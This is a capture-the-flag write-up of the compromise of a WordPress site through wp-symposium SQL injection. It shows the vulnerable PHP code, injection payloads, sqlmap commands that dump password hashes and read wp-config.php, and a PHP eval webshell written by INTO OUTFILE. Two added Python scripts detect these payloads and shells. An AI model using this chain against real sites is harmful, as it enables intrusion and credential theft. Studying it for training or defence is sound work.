0x00 Information gathering
The target URL is a WordPress blog.
Since it is WordPress, run wpscan against it.
[+] We found 2 plugins:

[+] Name: akismet | Latest version: 3.3.4
 |  Location: http://218.2.197.234:2040/wp-content/plugins/akismet/
[!] We could not determine a version so all vulnerabilities are printed out

[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8215
    Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
    Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
[i] Fixed in: 3.1.5

[+] Name: wp-symposium - v15.1
 |  Location: http://218.2.197.234:2040/wp-content/plugins/wp-symposium/
 |  Readme: http://218.2.197.234:2040/wp-content/plugins/wp-symposium/readme.txt
[!] The version is out of date, the latest version is 15.8.1
It found two outdated plugins, both with known vulnerabilities.
[!] Title: WP Symposium <= 15.1 - SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/7902
    Reference: http://permalink.gmane.org/gmane.comp.security.oss.general/16479
    Reference: http://packetstormsecurity.com/files/131801/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3325
    Reference: https://www.exploit-db.com/exploits/37080/
[i] Fixed in: 15.4

[!] Title: WP Symposium <= 15.5.1 - Unauthenticated SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/8140
    Reference: https://plugins.trac.wordpress.org/changeset/1214872/wp-symposium
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6522
    Reference: https://www.exploit-db.com/exploits/37824/
[i] Fixed in: 15.8

[!] Title: WP Symposium <= 15.1 - Blind SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/8148
    Reference: https://security.dxw.com/advisories/blind-sql-injection-in-wp-symposium-allows-unauthenticated-attackers-to-access-sensitive-data/
[i] Fixed in: 15.8
0x01 Exploitation
The CVE-2015-3325 SQL injection lives in get_album_item.php of the wp-symposium plugin.
<?php
include_once('../../../wp-config.php');
global $wpdb;
$iid  = $_REQUEST['iid'];
$size = $_REQUEST['size'];
// $size is concatenated straight into the SQL text; prepare() below only binds the %d for $iid,
// so the SELECT list is fully attacker-controlled (this is CVE-2015-3325).
$sql = "SELECT " . $size . " FROM " . $wpdb->base_prefix . "symposium_gallery_items WHERE iid = %d";
$image = $wpdb->get_var($wpdb->prepare($sql, $iid));
header("Content-type: image/jpeg");
echo stripslashes($image);
?>
Crafting the size parameter lets you run your own SQL query, and the code does no filtering. However, when querying column names with a table_name restriction nothing came back, and without the table_name restriction the response is capped at about 1 KB by the file-size limit, so the wp_users column names never show up.
?size=group_concat(column_name) FROM information_schema.columns WHERE table_schema=database() and table_name=%27users%27%20;%20--
No luck, so I dropped this one and turned to the blind-injection CVE.
https://www.exploit-db.com/exploits/37822/
The topic_id parameter is blind-injectable. Open the corresponding page, save the POST request to a file, and hand it to sqlmap. (I forgot to strip the sleep() call from the exploit while testing, which made the script run far longer than necessary...)
sqlmap -r "E:\1.txt" --dbs --level 3
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] wordpress
Table names:
sqlmap -r "E:\1.txt" -D "wordpress" --tables
Database: wordpress
[36 tables]
+------------------------------+
| wp_commentmeta               |
| wp_comments                  |
| wp_links                     |
| wp_options                   |
| wp_postmeta                  |
| wp_posts                     |
| wp_symposium_audit           |
| wp_symposium_cats            |
| wp_symposium_chat2           |
| wp_symposium_chat2_typing    |
| wp_symposium_chat2_users     |
| wp_symposium_comments        |
| wp_symposium_events          |
| wp_symposium_events_bookings |
| wp_symposium_extended        |
| wp_symposium_following       |
| wp_symposium_friends         |
| wp_symposium_gallery         |
| wp_symposium_gallery_items   |
| wp_symposium_group_members   |
| wp_symposium_groups          |
| wp_symposium_likes           |
| wp_symposium_lounge          |
| wp_symposium_mail            |
| wp_symposium_news            |
| wp_symposium_styles          |
| wp_symposium_subs            |
| wp_symposium_topics          |
| wp_symposium_topics_images   |
| wp_symposium_topics_scores   |
| wp_symposium_usermeta        |
| wp_term_relationships        |
| wp_term_taxonomy             |
| wp_terms                     |
| wp_usermeta                  |
| wp_users                     |
+------------------------------+
Column names:
sqlmap -r "E:\1.txt" -D "wordpress" -T "wp_users" --columns
Database: wordpress
Table: wp_users
[10 columns]
+---------------------+---------------------+
| Column              | Type                |
+---------------------+---------------------+
| display_name        | varchar(250)        |
| ID                  | bigint(20) unsigned |
| user_activation_key | varchar(60)         |
| user_email          | varchar(100)        |
| user_login          | varchar(60)         |
| user_nicename       | varchar(50)         |
| user_pass           | varchar(64)         |
| user_registered     | datetime            |
| user_status         | int(11)             |
| user_url            | varchar(100)        |
+---------------------+---------------------+
Dump the contents:
sqlmap -r "E:\1.txt" -D "wordpress" -T "wp_users" -C "user_pass" --dump
+------------------------------------+
| user_pass                          |
+------------------------------------+
| $P$BoRvgt/kaEDWqyiq0a3U8QjUQAO6gQ0 |
+------------------------------------+
With the table and column names known, CVE-2015-3325 can also be used to pull the administrator record:
?size=group_concat(user_nicename,0x7e,user_pass) FROM wp_users%20;%20--
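As an added detection example (not part of the original writeup): both get_album_item.php payloads above share a shape the vulnerable code itself explains, since a legitimate size value is a single column name. The script below, assuming Apache combined-format access logs and using constructed sample lines, flags requests whose decoded size parameter is not a bare identifier, and requests carrying the sqlmap user-agent seen in the blind-injection step.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format lines (not from the original post): one benign request,
# the two get_album_item.php payload shapes from the writeup, and an unrelated page view.
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2018:10:01:02 +0800] "GET /wp-content/plugins/wp-symposium/get_album_item.php?iid=3&size=thumb HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [12/May/2018:10:01:05 +0800] "GET /wp-content/plugins/wp-symposium/get_album_item.php?iid=3&size=group_concat(column_name)%20FROM%20information_schema.columns%20WHERE%20table_schema=database()%20and%20table_name=%27users%27%20;%20-- HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.9 - - [12/May/2018:10:02:11 +0800] "GET /wp-content/plugins/wp-symposium/get_album_item.php?iid=3&size=group_concat(user_nicename,0x7e,user_pass)%20FROM%20wp_users%20;%20-- HTTP/1.1" 200 512 "-" "sqlmap/1.2"
10.0.0.5 - - [12/May/2018:10:03:00 +0800] "GET /index.php HTTP/1.1" 200 7000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
                    r'(?P<status>\d+) \S+ "[^"]*" "(?P<ua>[^"]*)"')
# A legitimate size value names exactly one column; anything else was spliced into the SELECT list.
IDENT_RE = re.compile(r'^[A-Za-z_][A-Za-z0-9_]*$')
ENDPOINT = '/wp-content/plugins/wp-symposium/get_album_item.php'

def analyse(target, ua):
    """Return the reasons (possibly none) a request looks like the wp-symposium injection."""
    reasons = []
    parts = urlsplit(target)
    if parts.path.endswith(ENDPOINT):
        # parse_qs percent-decodes, so %20 / %27 in the payload become spaces and quotes.
        for size in parse_qs(parts.query, keep_blank_values=True).get('size', []):
            if not IDENT_RE.match(size):
                reasons.append('size is not a bare column name: %r' % size)
    if 'sqlmap' in ua.lower():
        reasons.append('sqlmap user-agent')
    return reasons

def scan_log(text):
    """Return (ip, target, reasons) for each suspicious line of an access log."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = analyse(m['target'], m['ua'])
        if reasons:
            hits.append((m['ip'], m['target'], reasons))
    return hits

if __name__ == '__main__':
    for ip, target, reasons in scan_log(SAMPLE_LOG):
        print(ip, target[:60], reasons)
```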
But the administrator password stored in the database is a strong hash, so it can't be reversed.
An earlier scan showed the server also exposes a phpMyAdmin page, which is another way in.
Use sqlmap to retrieve the phpMyAdmin (database user) passwords:
sqlmap -r "E:\1.txt" --current-user --password
database management system users password hashes:
[*] debian-sys-maint [1]:
    password hash: *AA59232D46C9C0751BA3069045A0B90F3C6431C4
[*] root [1]:
    password hash: *74ACCF7FB15CDBAEE88B9E7F7B58352D3308CFF2
[*] wordpress [1]:
    password hash: *A22BD9F95BF505E792C556FC1EF9FCFA6B6B5D9B
No way to crack these either...
On a teammate's tip, use sqlmap to read the WordPress config file directly:
sqlmap -r "E:\1.txt" --file-read "/var/www/html/wp-config.php" -p "topic_id"
That gives the phpMyAdmin (database) username and password.
Getshell
Log in to phpMyAdmin and write a shell with a SQL query:
select '<?php @eval($_POST[adadminn])?>' INTO OUTFILE '/var/www/html/nibuhuicaidao.php' ;
Error: Can't create/write to file '/var/www/html/nibuhuicaidao.php' (Errcode: 13)
The directory is not writable.
Brute-forcing directories with DirBuster turned up an images directory; testing showed it is writable.
select '<?php @eval($_POST[adadminn])?>' INTO OUTFILE '/var/www/html/images/nibuhuicaidao.php' ;
Connect with Caidao (China Chopper) and pick up the flag: flag{Hi_Web_fLaG_Is_HEre}
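The Errcode 13 above is the only thing that stood between the database account and a shell on disk: INTO OUTFILE succeeds wherever the mysqld process can write under the web root. As an added example (not from the original writeup), the audit below walks a web root and reports directories writable by a given uid/gid set, plus PHP files matching the eval-of-request-parameter pattern of the dropped shell; it builds a constructed sample tree in a temp directory, with the db uid assumed not to own anything there.

```python
import os
import re
import stat
import tempfile

# Matches the one-liner shell written via INTO OUTFILE in the writeup (and close variants).
SHELL_RE = re.compile(rb'(?:eval|assert)\s*\(\s*\$_(?:POST|GET|REQUEST)\b')

def writable_by(st, uid, gids):
    """True if a process running as uid (member of gids) may write into this directory."""
    m = st.st_mode
    return bool((m & stat.S_IWOTH)
                or (m & stat.S_IWGRP and st.st_gid in gids)
                or (m & stat.S_IWUSR and st.st_uid == uid))

def audit_webroot(root, db_uid, db_gids=frozenset()):
    """Return (dirs the DB user could write into, PHP files that look like eval shells),
    both as paths relative to root."""
    writable, shells = [], []
    for dirpath, _, filenames in os.walk(root):
        if writable_by(os.stat(dirpath), db_uid, db_gids):
            writable.append(os.path.relpath(dirpath, root))
        for name in filenames:
            if name.endswith('.php'):
                path = os.path.join(dirpath, name)
                with open(path, 'rb') as fh:
                    if SHELL_RE.search(fh.read()):
                        shells.append(os.path.relpath(path, root))
    return sorted(writable), sorted(shells)

def build_sample_tree():
    """Constructed web root: a locked-down top level and a world-writable images/ holding a shell."""
    root = tempfile.mkdtemp()            # created 0700, owned by the current user
    os.mkdir(os.path.join(root, 'images'))
    os.chmod(os.path.join(root, 'images'), 0o777)
    with open(os.path.join(root, 'index.php'), 'w') as fh:
        fh.write('<?php echo "hello"; ?>')
    with open(os.path.join(root, 'images', 'nibuhuicaidao.php'), 'w') as fh:
        fh.write('<?php @eval($_POST[adadminn])?>')
    return root

if __name__ == '__main__':
    root = build_sample_tree()
    # db_uid=-1: assume the database account owns nothing under the web root.
    dirs, shells = audit_webroot(root, db_uid=-1)
    print('writable by db user:', dirs)
    print('shell-like php files:', shells)
```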